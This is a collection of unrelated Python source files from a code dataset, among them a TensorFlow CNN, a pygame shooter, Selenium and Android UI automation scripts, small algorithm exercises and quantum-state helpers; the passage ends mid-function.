xmlFields=tree.parse('/home/zst/works/IAAP/src/Config/systemmanager/PrivacyPolicyConfig.xml')\n for xml in xmlFields:\n name,mark,start,end,caption=xml.findtext('Name'),xml.findtext('Mark'),xml.findtext('Start'),xml.findtext('End'),xml.findtext('Caption')\n privacyPolicy=PrivacyPolicyConfig(name,mark,start,end,caption)\n privacyPolicyFields[name]=privacyPolicy\n \nif __name__=='__main__':\n parsePrivacyPolicyConfig()\n \n \n \n \n ","sub_path":"service/com/zctt/iaap/services/systemmanager/systemManageUtils.py","file_name":"systemManageUtils.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"60634630","text":"from artiq import *\n\nimport pulse_rate, rtio_skew, rpc_timing\n\n\n_exps = [pulse_rate.PulseRate, rtio_skew.RTIOSkew, rpc_timing.RPCTiming]\n\nclass AllBenchmarks(Experiment, AutoDB):\n \"\"\"All benchmarks\"\"\"\n\n def build(self):\n self.se = []\n for exp in _exps:\n self.se.append(exp(self.dbh))\n\n def run(self):\n for se in self.se:\n se.run()\n","sub_path":"benchmarks/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"94782410","text":"from selenium import webdriver\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.actions import mouse_button\r\nfrom selenium.webdriver.common.by import By\r\nimport selenium.common.exceptions\r\nimport pyautogui\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as ec\r\n\r\n\r\nbrowser = webdriver.Chrome()\r\nbrowser.maximize_window()\r\nwait = WebDriverWait(browser, 10)\r\n# sleep(1)\r\nbrowser.get(\"http://mangahere.win/\")\r\n# sleep(1)\r\n# advertisment_cancle_button = browser.find_element_by_xpath(\"//*[@id='AdskeeperC992642Popup-close-btn']/img\")\r\n# ads = advertisment_cancle_button.is_displayed()\r\n\"\"\"\r\nif ads == true :\r\n advertisment_cancle_button.click()\r\n print('advertiserment is removed good to go ....!!')\r\n\"\"\"\r\nsearch_box = browser.find_element_by_class_name(\"searchi\")\r\n\r\nsearch_box.send_keys(\"Kanojo\")\r\nsleep(2)\r\nkanojo_okarishimasu =browser.find_element_by_xpath(\"//*[@id='3585']/div\")\r\n\r\nprint(f'kanojo button is appeared : ' + str(kanojo_okarishimasu.is_displayed()))\r\n\r\nprint(f'kanojo button is enabled : ' + str(kanojo_okarishimasu.is_enabled()))\r\nkanojo_okarishimasu.click()\r\n\r\nchart_list = browser.find_element(By.XPATH, \"//*[@id='chapter']/div/div[2]/div[1]/span[1]/a\")\r\n\r\nprint(f'if chart list is appeared : '+ str(chart_list.is_displayed()))\r\nprint(f'chart list button is enabled : ' + str(chart_list.is_enabled()))\r\n# if yeah == \"true\":\r\nchart_list.click()\r\n\r\ntry:\r\n wait.until(ec.element_to_be_clickable(\r\n browser.find_element_by_xpath(\"//*[@id='AdskeeperC992642Popup-close-btn']/img\")))\r\n ads_cut_button = browser.find_element_by_xpath(\"//*[@id='AdskeeperC992642Popup-close-btn']/img\")\r\n print(f'ads button is appeared : ' + str(ads_cut_button.is_displayed()))\r\n print(f'ads button is enabled : '+ str(ads_cut_button.is_enabled()))\r\n ads_cut_button.click()\r\nexcept Exception as e:\r\n print(e)\r\n\r\n","sub_path":"AUTO/kanojo check .py","file_name":"kanojo check .py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"1759126","text":"import csv\n\n\nclass CsvFile:\n def __init__(self, simtime=0, latitude=0, longitude=0, sog=0, cog=0, heading=0, aftthruster=0, forethruster=0,\n portengine=0, stbdengine=0, portrudder=0, stbdrudder=0, iceload=0):\n self.simtime = simtime\n self.latitude = latitude\n self.longitude = longitude\n self.sog = sog\n self.cog = cog\n self.heading = heading\n self.aftthruster = aftthruster\n self.forethruster = forethruster\n self.portengine = portengine\n self.stbdengine = stbdengine\n self.portrudder = portrudder\n self.stbdrudder = stbdrudder\n self.iceload = iceload\n \n## Populate a CsvFile from the contents of a Python dictionary (dict) \n @classmethod\n def fromDict(cls, dict):\n return cls(dict[\"SimTime\"],\n abs(dict[\"Lat\"]), abs(dict[\"Long\"]),\n dict[\"SOG\"], dict[\"COG\"],dict[\"Heading\"],\n dict[\"Aft\"], dict[\"Fore\"],\n dict[\"PortE\"], dict[\"StbdE\"],\n dict[\"PortR\"], dict[\"StbdR\"],\n dict[\"IceLoad\"])\n\nclass CsvRowsOperator:\n def __init__(self):\n self.log_objects = []\n\n def read_file(self, filename):\n csv_reader = csv.reader(filename, delimiter=',', quotechar='|')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n continue\n else:\n self.log_objects.append(\n CsvFile(float(row[0]), float(row[1]), abs(float(row[2])), float(row[3]), float(row[4]),\n float(row[5]),\n float(row[6]), float(row[7]), float(row[8]), float(row[9]), float(row[10]),\n float(row[11])))\n line_count += 1\n return self.log_objects\n","sub_path":"log_file.py","file_name":"log_file.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"78988508","text":"class ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n \n if head == None or head.next == None:\n return head\n \n equisita = self.reverseList(head.next) \n head.next.next = head\n head.next = None\n return equisita\n\nn1 = ListNode(1)\nn2 = ListNode(2)\nn3 = ListNode(3)\nn4 = ListNode(4)\nn5 = ListNode(5)\n\nn1.next = n2\nn2.next = n3\nn3.next = n4\nn4.next = n5\n\ntestcase = n1\nmysol = Solution() \nprint(mysol.reverseList(n1))\n ","sub_path":"204_ReverseLinkedList/1stApproach.py","file_name":"1stApproach.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"549593266","text":"from typing import Dict\nfrom sanitize_ml_labels import sanitize_ml_labels\nfrom .notipy_me import Notipy\n\ntry:\n from tensorflow.keras.callbacks import Callback\nexcept ModuleNotFoundError:\n pass\nelse:\n class KerasNotipy(Callback):\n\n def __init__(\n self,\n task_name: str = None,\n metadata: Dict = None,\n report_only_validation: bool = True,\n sanitize_metrics: bool = True\n ):\n \"\"\"Create new Keras Notipy object.\n\n Parameters\n -----------------\n task_name: str = None,\n Optional name of the task to use for report.\n metadata: Dict = None,\n Optional metadata to be reported alongside data.\n report_only_validation: bool = True,\n Report only metrics relative to the validation set.\n If the log only contains metrics relative to the training,\n this limitation is automatically lifted.\n sanitize_metrics: bool = True,\n Sanitize the names of the metrics.\n \"\"\"\n super().__init__()\n self._metadata = {} if metadata is None else metadata\n self._notipy = Notipy(task_name=task_name)\n self._report_only_validation = report_only_validation\n self._sanitize_metrics = sanitize_metrics\n\n def on_train_begin(self, logs=None):\n \"\"\"Start notipy as the training begins.\"\"\"\n self._notipy.enter()\n\n def on_epoch_end(self, epoch: int, logs=None):\n \"\"\"When the epoch ends we report how the model is doing.\"\"\"\n if logs is not None:\n log_has_validation = any(\n metric.startswith(\"val\")\n for metric in logs\n )\n self._notipy.add_report({\n **self._metadata,\n **{\n sanitize_ml_labels(metric) if self._sanitize_metrics else metric: value\n for metric, value in logs.items()\n if not self._report_only_validation or metric.startswith(\"val\") or not log_has_validation\n },\n \"epoch\": epoch\n })\n\n def on_train_end(self, logs=None):\n \"\"\"When the training is complete we close down also the Notipy.\"\"\"\n self._notipy.exit()\n","sub_path":"notipy_me/keras_notipy.py","file_name":"keras_notipy.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333859772","text":"from skimage import io,transform\nimport glob\nimport os\nimport numpy as np\nimport tensorflow as tf\npath=\"F:/datas/flower_photos/\"\nmodel_path=\"model.ckpt\"\n\nw=100\nh=100\nc=3\n\ndef read_img(path):\n cate=[path+x for x in os.listdir(path) if os.path.isdir(path+x)]\n imgs=[]\n labels=[]\n for idx,folder in enumerate(cate):\n for im in glob.glob(folder+'/*.jpg'):\n print(\"reading images:%s\"%(im))\n img=io.imread(im)\n img=transform.resize(img,(w,h))\n imgs.append(img)\n labels.append(idx)\n return np.asarray(imgs,np.float32),np.asarray(labels,np.int32)\n\ndef model(input_tensor,train,regularizer):\n with tf.Variable_scope(\"layer1-conv1\"):\n conv1_weights=tf.get_variable(\"weight\",[5,5,3,32],initializer=tf.truncated_normal_initializer(stddev=0.1))\n conv1_biases=tf.get_variable(\"bias\",[32],initializer=tf.constant_initializer(0.0))\n conv1=tf.nn.conv2d(input_tensor,conv1_weights,strides=[1,1,1,1],padding=\"SAME\")\n relu1=tf.nn.relu(tf.nn.bias_add(conv1,conv1_biases))\n with tf.name_scope(\"layer1-pool1\"):\n pool1=tf.nn.max_pool(relu1,ksize=[1,2,2,1],strides=[1,2,2,1],padding=\"VALID\")\n with tf.Variable_scope(\"layer3-conv2\"):\n conv2_weights=tf.get_variable(\"weight\",[5,5,32,64],initializer=tf.truncated_normal_initializer(stddev=0.1))\n conv2_biases = tf.get_variable(\"bias\", [64], initializer=tf.constant_initializer(0.0))\n conv2 = tf.nn.conv2d(pool1, conv2_weights, strides=[1, 1, 1, 1], padding=\"SAME\")\n relu2 = tf.nn.relu(tf.nn.bias_add(conv2, conv2_biases))\n with tf.name_scope(\"layer4-pool2\"):\n pool2=tf.nn.max_pool(relu2,ksize=[1,2,2,1],strides=[1,2,2,1],padding=\"VALID\")\n # s=np.int(num_example*ratio)\n with tf.Variable_scope(\"layer5-conv3\"):\n conv3_weights = tf.get_variable(\"weight\", [3, 3, 64, 128],\n initializer=tf.truncated_normal_initializer(stddev=0.1))\n conv3_biases = tf.get_variable(\"bias\", [128], initializer=tf.constant_initializer(0.0))\n conv3 = tf.nn.conv2d(pool2, conv3_weights, strides=[1, 1, 1, 1], padding=\"SAME\")\n relu3 = tf.nn.relu(tf.nn.bias_add(conv3, conv3_biases))\n with tf.name_scope(\"layer6-pool3\"):\n pool3 = tf.nn.max_pool(relu3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"VALID\")\n\n with tf.Variable_scope(\"layer7-conv4\"):\n conv4_weights = tf.get_variable(\"weight\", [3, 3, 128, 128],\n initializer=tf.truncated_normal_initializer(stddev=0.1))\n conv4_biases = tf.get_variable(\"bias\", [128], initializer=tf.constant_initializer(0.0))\n conv4 = tf.nn.conv2d(pool3, conv4_weights, strides=[1, 1, 1, 1], padding=\"SAME\")\n relu4 = tf.nn.relu(tf.nn.bias_add(conv4, conv4_biases))\n with tf.name_scope(\"layer8-pool4\"):\n pool4 = tf.nn.max_pool(relu4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"VALID\")\n nodes=6*6*128\n reshaped=tf.reshape(pool4,[-1,nodes])\n print(\"shape of reshaped:\",reshaped.shape)\n\n\n with tf.Variable_scope(\"layer9-fc1\"):\n fc1_weights=tf.get_variable(\"weight\",[nodes,1024],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer!=None:\n tf.add_to_collection(\"losses\",regularizer(fc1_weights))\n fc1_biases=tf.get_variable(\"baise\",[1024],initializer=tf.constant_initializer(0.1))\n fc1=tf.nn.relu(tf.matmul(reshaped,fc1_weights)+fc1_biases)\n if train:\n fc1=tf.nn.dropout(fc1,0.5)\n\n with tf.Variable_scope(\"layer10-fc2\"):\n fc2_weights=tf.get_variable(\"weight\",[1024,512],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer!=None:\n tf.add_to_collection(\"losses\",regularizer(fc2_weights))\n fc2_biases=tf.get_variable(\"baise\",[512],initializer=tf.constant_initializer(0.1))\n fc2=tf.nn.relu(tf.matmul(reshaped,fc1_weights)+fc2_biases)\n if train:\n fc2=tf.nn.dropout(fc2,0.5)\n\n\n with tf.Variable_scope(\"layer11-fc3\"):\n fc3_weights=tf.get_variable(\"weight\",[512,5],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer!=None:\n tf.add_to_collection(\"losses\",regularizer(fc3_weights))\n fc3_biases=tf.get_variable(\"baise\",[5],initializer=tf.constant_initializer(0.1))\n logit=tf.matmul(fc2,fc3_weights)+fc3_biases\n return logit\n\n\n","sub_path":"ML_learning/flower_class.py","file_name":"flower_class.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"410565279","text":"'''\nCreated on Apr 28, 2015\n\n@author: saul\n\nAlien base class, for standard behavior\nsubclasses for varied behavior\n'''\nimport pygame\nfrom item import Item\nfrom bullet import AlienBullet\nfrom math import cos,sin, pi\nimport random\n\nclass Alien(Item):\n \n def __init__(self, x, y, maxy):\n super().__init__(x, y)\n self.image = pygame.image.load(\"./res/a1.png\").convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.maxy = maxy\n self.amp = 30\n self.speed= 1\n self.power = 5\n self.attack = 100\n self.aCount = random.randint(0, self.attack)\n self.angle = 30\n \n def tryFire(self):\n# if self.rect.y < 0: return False #no shooting till on screen\n return self.aCount >= self.attack\n \n def fire(self):\n self.aCount = 0\n \n return AlienBullet(self.getCenter()[0]-25, self.getCenter()[1])\n \n \n def update(self):\n if not self.explode:\n self.vx = self.amp // self.speed * cos((self.aCount- self.attack//2)/pi)\n self.vy = self.speed\n \n #make them stop half way\n# if self.rect.y > self.maxy: \n# self.vy = 0\n\n\n# if self.aCount % 5 == 0:\n# self.image = pygame.transform.rotate(self.image, self.angle)\n if self.aCount < self.attack:\n self.aCount += 1\n \n super().update()\n \n #true alive\n def hit(self, hitPower):\n self.power -= hitPower\n return self.power > 0 \n \nclass Three(Alien):\n def __init__(self, x, y, maxy):\n super().__init__(x, y, maxy)\n self.image = pygame.image.load(\"./res/a3.png\").convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n \n self.amp = 33\n self.speed= 3 \n self.power = 12\n self.attack = 80\n \nclass Star(Alien):\n def __init__(self, x, y, maxy):\n super().__init__(x, y, maxy)\n self.image = pygame.image.load(\"./res/a4.png\").convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n \n self.amp = 60\n self.speed= 4\n self.power = 20\n self.attack = 20\n \nclass CommandShip(Alien):\n def __init__(self, x, y,maxy, drones=10):\n super().__init__(x, y, maxy)\n self.image = pygame.image.load(\"./res/a2.png\").convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n \n self.amp = 30\n self.speed= 2 \n self.power = 30\n# self.image.fill(pygame.Color(50,100,100))\n self.droneCount = drones\n self.drones = pygame.sprite.Group()\n# self.makeDrones()\n self.attack = 40\n self.aCount = 0\n \n def makeDrones(self):\n n = self.droneCount\n \n for i in range(0, n):\n self.drones.add(Drone(self.getCenter(), n=i, count=self.droneCount))\n \n def update(self):\n# if not self.explode:\n# self.vx = -self.rect.y + self.amp * sin(self.rect.y * pi / 180)\n# self.vy = self.speed\n \n super().update()\n for d in self.drones:\n d.center = self.getCenter()\n \n \n \nclass Drone(Three):\n def __init__(self, center, n, count):\n super().__init__(0, 0, 2000)\n# \n# self.image = pygame.Surface([20, 20])\n# self.image.fill(pygame.Color(234,200,100))\n# \n# self.rect = self.image.get_rect()\n# \n self.center = center\n self.r = 150\n self.speed = 1\n self.angle = n * 360/count\n# self.power = 1\n \n def update(self):\n \n j = self.center[0]\n k = self.center[1]\n self.angle += self.speed\n a = self.angle\n r = self.r\n x = j + r* cos(a* pi /180)\n y = k + r* sin(a* pi / 180)\n# t = 'x: ' + str(x) + ' y: ' + str(y)\n# print(t)\n self.rect.x = int(x)\n self.rect.y = int(y)\n \n \n# super().update()\n \n \n \n \n \n \n ","sub_path":"final version/alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"587821408","text":"# coding=utf-8\na = input('a: ')\nb = input('b: ')\nc = input('c: ')\nm1 = int\nm2 = int\nm3 = int\n\n\nif a + b > c or b + c > a or c + a > b:\n print ('Triangle exist')\n if (a > b) and (a > c):\n m1 = a\n m2 = b\n m3 = c\n elif (b > a) and (b > c):\n m1 = b\n m2 = c\n m3 = a\n elif (c > a) and (c > b):\n m1 = c\n m2 = a\n m3 = b\n if m1 ** 2 == (m2 ** 2 + m3 ** 2):\n print(\"Triangle is right\") # прямоугольный sqrt(a) = sqrt(b) + sqrt(c)\n elif m1 ** 2 < (m2 ** 2 + m3 ** 2):\n print (\"Triangle is acute\") # остроугольный sqrt(a) = sqrt(b) + sqrt(c)\n elif m1 ** 2 > (m2 ** 2 + m3 ** 2):\n print ('Triangle is obtuse') # тупоугольный sqrt(a) = sqrt(b) + sqrt(c)\n\nelse:\n print ('Triangle does not exist')\n","sub_path":"Informatics/Boolean/triangle_type.py","file_name":"triangle_type.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570205360","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom uiautomatorplug.android import device as d\r\nimport os\r\nimport time\r\nimport shutil\r\nimport subprocess\r\n\r\n\r\ndef registerSysWatchers():\r\n d.watchers.reset()\r\n d.watchers.remove()\r\n d.watcher(\"IGNORE_ANR\").when(textContains='无响应').click(text='确定')\r\n d.watcher(\"IGNORE_CRASH\").when(textContains='停止运行').click(text='确定')\r\n d.watcher(\"IGNORE_POPWINDOW_WEIBO\").when(textContains='给我们评分').click(text='不了,谢谢')\r\n d.watcher(\"IGNORE_DRAFT\").when(textContains='是否保存草稿').click(text='不保存草稿')\r\n d.watcher(\"IGNORE_LOCATION\").when(textContains='位置信息').click(text='拒绝')\r\n d.watcher(\"IGNORE_WLAN\").when(textContains='WLAN').click(text='确定')\r\n d.watcher(\"IGNORE_NAVIGATION\").when(textContains='离线地图').click(text='暂不需要')\r\n d.watcher(u\"fc\").when(textContains=u\"很抱歉\").click(text=u\"确定\")\r\n\r\n\r\ndef checkSystemWatchers():\r\n if d.watcher(\"IGNORE_ANR\").triggered:\r\n raise Exception('AUTO_FC_WHEN_ANR')\r\n if d.watcher(\"IGNORE_CRASH\").triggered:\r\n raise Exception('IGNORE_CRASH')\r\n if d.watcher(u\"fc\").triggered:\r\n raise Exception(\"Force close occurs\")\r\n d.watchers.reset()\r\n d.watchers.remove()\r\n\r\n\r\nclass util(object):\r\n\r\n def __init__(self):\r\n super(util, self).__init__()\r\n\r\n\r\n def clog(self):\r\n os.system(\"adb logcat -c\")\r\n\r\n def log(self):\r\n cmd = 'adb shell logcat -v time -d '\r\n # 以时间命名 2016-04-16-05\r\n line = self.path\r\n # 以caseName命名 OtherTest.test_fail\r\n os.makedirs(\"testresult\" + os.sep + self.path + os.sep + \"log\" + os.sep + self.folder)\r\n # record_log=\"testresult/2016-04-16-05/OtherTest.test_fail/2010xxx.log\"\r\n record_log = \"testresult\" + os.sep + self.path + os.sep + \"log\" + os.sep + self.folder + os.sep + time.strftime(\r\n \"%Y%m%d%H%M%S\",\r\n time.localtime(\r\n time.time())) + \".log\"\r\n with open(record_log, 'w') as f:\r\n p = subprocess.Popen(cmd, stdout=f, stderr=subprocess.PIPE, shell=True)\r\n\r\n def result_path(self):\r\n # under testresult, mkdir 2016-04-16-05\r\n # 定义成全局的?\r\n iso_time_format = '%Y-%m-%d-%H-%M'\r\n self.path = time.strftime(iso_time_format, time.localtime(time.time()))\r\n if os.path.exists(\"testresult\" + os.sep + self.path):\r\n shutil.rmtree(\"testresult\" + os.sep + self.path)\r\n time.sleep(2)\r\n os.mkdir(\"testresult\" + os.sep + self.path)\r\n return self.path\r\n\r\n def recordcase(self, caseName, className):\r\n\r\n self.folder = getattr(caseName, \"__name__\")\r\n","sub_path":"atPhoenix/buildcheck/CZFileManager/common/util_copy.py","file_name":"util_copy.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"135026558","text":"class Board(object):\n def __init__(self,board):\n self.board = board\n \n def getBoardState(self):\n if self.board:\n return self.board\n else:\n return None\n \n def updateBoard(self,pos,pieceType):\n \n if pieceType == None or pos[0] == None or pos[1] == None or pos == None:\n return False\n \n i = pos[0]\n j = pos[1]\n \n if board[i][j] != None:\n return False\n else:\n board[i][j] = pieceType\n return True\n\nimport Board\nclass Player(object):\n def __init__(self,name,playerType,piece):\n self.name = name\n self.playerType = playerType\n self.piece = piece\n \n def checkState(self):\n board = Board()\n boardState = board.getBoardState()\n # pass it to UI, UI displays the board\n \n def playMove(self,pos,pieceType):\n board = Board()\n return board.updateBoard(pos,pieceType)\n \nclass Game(object):\n def __init_(self,board,player_1,player_2, player1_piece, player2_piece,winner):\n self.board = board\n self.player_1 = player_1\n self.player_2 = player_2\n self.player1_piece = player1_piece\n self.player2_piece = player2_piece\n self.winner","sub_path":"SalesForce/TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256916816","text":"from graphics import *\nfrom math import pi\nfrom math import cos\nfrom math import sin\n\nWIN_WIDTH = 500\nWIN_HEIGHT = 500\n\nTRUNK_X = WIN_WIDTH/2\nTRUNK_Y = WIN_HEIGHT\n\nINIT_LENGTH = 125;\nINIT_THICKNESS= 10;\nMID_BRANCH_LENGTH_MULTIPLIER = 1/4\nLEFT_BRANCH_LENGTH_MULTIPLIER = 1/2\nRIGHT_BRANCH_LENGTH_MULTIPLIER = 2/5\nLENGTH_MULTIPLIER = 2/3\nTHICKNESS_MULTIPLIER = 2/3\n\nINIT_ROT_ADDITION = 0\nINIT_TRUNK_ANGLE = pi/2\nINIT_MID_BRANCH_ANGLE = pi/14\nINIT_LEFT_BRANCH_ANGLE = pi/4\nINIT_RIGHT_BRANCH_ANGLE = pi/6\n\nwin = GraphWin(\"Fractal Tree\", WIN_WIDTH, WIN_HEIGHT)\n\ndef main():\n quit = False\n while not quit:\n n = int(input(\"Input size of tree (0, 1, 2, 3...): \"))\n draw_tree(TRUNK_X, TRUNK_Y, INIT_LENGTH, INIT_THICKNESS, INIT_ROT_ADDITION, n, 0)\n if input(\"Continue? (y/n) \") != \"y\":\n quit = True\n if not quit:\n clear()\n\ndef draw_tree(x, y, line_length, line_thickness, additional_rot, n, num_rec_calls):\n\n base_x = x + line_length*cos(INIT_TRUNK_ANGLE+ additional_rot)\n base_y = y - line_length*sin(INIT_TRUNK_ANGLE + additional_rot)\n\n point1 = Point(x, y)\n point2 = Point(base_x, base_y)\n line1 = Line(point1, point2)\n line1.setWidth(line_thickness)\n line1.draw(win)\n\n point3 = Point(base_x - line_length * MID_BRANCH_LENGTH_MULTIPLIER * sin(INIT_MID_BRANCH_ANGLE + additional_rot), \n base_y - line_length * MID_BRANCH_LENGTH_MULTIPLIER * cos(INIT_MID_BRANCH_ANGLE + additional_rot))\n line2 = Line(point2, point3)\n line2.setWidth(2*line_thickness/3)\n line2.draw(win)\n\n point4 = Point(base_x - line_length * LEFT_BRANCH_LENGTH_MULTIPLIER * sin(INIT_LEFT_BRANCH_ANGLE + additional_rot), \n base_y - line_length * LEFT_BRANCH_LENGTH_MULTIPLIER * cos(INIT_LEFT_BRANCH_ANGLE+ additional_rot))\n line3 = Line(point2, point4)\n line3.setWidth(2*line_thickness/3)\n line3.draw(win)\n\n point5 = Point(base_x + line_length * RIGHT_BRANCH_LENGTH_MULTIPLIER * sin(INIT_RIGHT_BRANCH_ANGLE - additional_rot), \n base_y - line_length * RIGHT_BRANCH_LENGTH_MULTIPLIER * cos(INIT_RIGHT_BRANCH_ANGLE - additional_rot))\n line4 = Line(point2, point5)\n line4.setWidth(2*line_thickness/3)\n line4.draw(win)\n\n if num_rec_calls == n:\n return\n\n draw_tree(point2.x, point2.y, \n line_length * LENGTH_MULTIPLIER, line_thickness * THICKNESS_MULTIPLIER, \n INIT_MID_BRANCH_ANGLE + additional_rot, \n n, \n num_rec_calls + 1)\n draw_tree(point2.x, point2.y, \n line_length * LENGTH_MULTIPLIER, line_thickness * THICKNESS_MULTIPLIER, \n INIT_LEFT_BRANCH_ANGLE + additional_rot, \n n, \n num_rec_calls + 1)\n draw_tree(point2.x, point2.y, \n line_length * LENGTH_MULTIPLIER, line_thickness * THICKNESS_MULTIPLIER, \n -INIT_RIGHT_BRANCH_ANGLE + additional_rot, \n n, \n num_rec_calls + 1)\n\ndef clear():\n for item in win.items[:]:\n item.undraw()\n\nmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"355796763","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 10 04:58:37 2021\n\n@author: robert\n\"\"\"\n\n# we will use the seive of erasthones algorithm\n\nimport numpy as np\n\nN = 1000000\n\nprimes = np.arange(start=2, stop=N+1, step=1)\nfor i in range(0,N-2):\n if primes[i] > N**0.5:\n break\n if primes[i] != 0:\n for j in range(1,N//primes[i]):\n primes[i+j*primes[i]]=0\n\n# print(primes)\n\nnon_zero_filter = np.vectorize(bool)(primes)\nprimes = primes[non_zero_filter]\n\n","sub_path":"Seive of Erasthones.py","file_name":"Seive of Erasthones.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"210299929","text":"import numpy as np\nimport qutip as qtp\n\nfrom numpy import exp, sqrt\nfrom scipy.constants import pi\nfrom scipy.special import factorial, eval_hermite, erf\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nfrom qutip import Qobj\nfrom qutip.matplotlib_utilities import complex_phase_cmap\nfrom numpy import angle\n\nfrom libys.plot3d import Axes3DForceZOrder as Axes3D\n\n\ndef rotation(N: int, theta: float):\n diags = [exp(-1j * n * theta) for n in range(N)]\n return qtp.qdiags(diags, 0)\n\n\ndef fidelity(rho: qtp.Qobj, ket: qtp.Qobj):\n return rho.matrix_element(ket.dag(), ket).real\n\n\n# ⟨x|n⟩\ndef fock_wave_function(x, n):\n coefficient = (2**n * factorial(n) * sqrt(pi))**-0.5\n return coefficient * exp(-x**2 / 2) * eval_hermite(n, x)\n\n\n# |x⟩\n# N - number of dimensions in Hilbert space\ndef x_ket(N: int, x: float):\n n = np.arange(N)\n array = fock_wave_function(x, n)\n return qtp.Qobj(array)\n\n\n# ⟨x|ρ|x⟩\ndef x_probability_density(rho: qtp.Qobj, x_array: np.ndarray):\n N = rho.shape[0] # number of dimensions in Hilbert space\n pd = np.empty_like(x_array) # probability density\n\n for i in range(len(pd)):\n x = x_ket(N, x_array[i])\n pd[i] = rho.matrix_element(x, x).real\n\n return pd\n\n\n# ∫_lo^hi ⟨0|x⟩⟨x|0⟩ dx\ndef int_0x_x0(lo, hi):\n return (erf(hi) - erf(lo))/2\n\n\n# ∫_lo^hi ⟨0|x⟩⟨x|1⟩ dx\ndef int_0x_x1(lo, hi):\n return (exp(-lo**2) - exp(-hi**2)) / sqrt(2*pi)\n\n\n# ∫_lo^hi ⟨1|x⟩⟨x|1⟩ dx\ndef int_1x_x1(lo, hi):\n return np.where(\n np.isinf(hi),\n (erf(hi) - erf(lo))/2 + lo*exp(-lo**2) / sqrt(pi),\n (erf(hi) - erf(lo))/2 + (lo*exp(-lo**2) - hi*exp(-hi**2)) / sqrt(pi)\n )\n\n\n# ∫_lo^hi |x⟩⟨x| dx\ndef int_xx(lo: float, hi: float):\n return qtp.Qobj([\n [int_0x_x0(lo, hi), int_0x_x1(lo, hi)],\n [int_0x_x1(lo, hi), int_1x_x1(lo, hi)]\n ])\n\n\n# ⟨i|_n q |j⟩_n\ndef submatrix(q: qtp.Qobj, n: int, i: int, j: int):\n N = len(q.dims[0]) # number of qubits\n proj_i = tensor_1hot(N, n, qtp.basis(0).dag())\n proj_j = tensor_1hot(N, n, qtp.qeye(), qtp.basis(j).proj())\n return proj_i * q * proj_j\n\n\n# calculate operator-sum representation Σ_k E_k ρ E_k†\ndef operator_sum(rho: qtp.Qobj, *E: qtp.Qobj):\n return sum(E_k * rho * E_k.dag() for E_k in E)\n\n\n# create a one-hot tensor\ndef tensor_1hot(N: int, n: int, most: qtp.Qobj, one: qtp.Qobj):\n qobjs = N * [most]\n qobjs[n] = one\n return qtp.tensor(qobjs)\n\n\n# amplitude-damp n-th qubit\n# rho - density matrix\n# N - number of qubits\n# gamma - decay probability\ndef amplitude_damp(rho: qtp.Qobj, N: int, n: int, gamma: float):\n e0 = qtp.Qobj([\n [1, 0],\n [0, sqrt(1-gamma)]\n ])\n\n e1 = qtp.Qobj([\n [0, sqrt(gamma)],\n [0, 0]\n ])\n\n e0_N = tensor_1hot(N=N, n=n, most=qtp.qeye(2), one=e0)\n e1_N = tensor_1hot(N=N, n=n, most=qtp.qzero(2), one=e1)\n return operator_sum(rho, e0_N, e1_N)\n\n\n# create an N-qubit 1D cluster state\ndef cluster_1d(N: int):\n zero = qtp.fock(2, 0)\n one = qtp.fock(2, 1)\n plus = (zero + one) / sqrt(2)\n psi = qtp.tensor(N * [plus])\n\n for i in range(N - 1):\n cz = qtp.csign(N=N, control=i, target=i+1)\n psi = cz * psi\n\n return psi\n\n\ndef 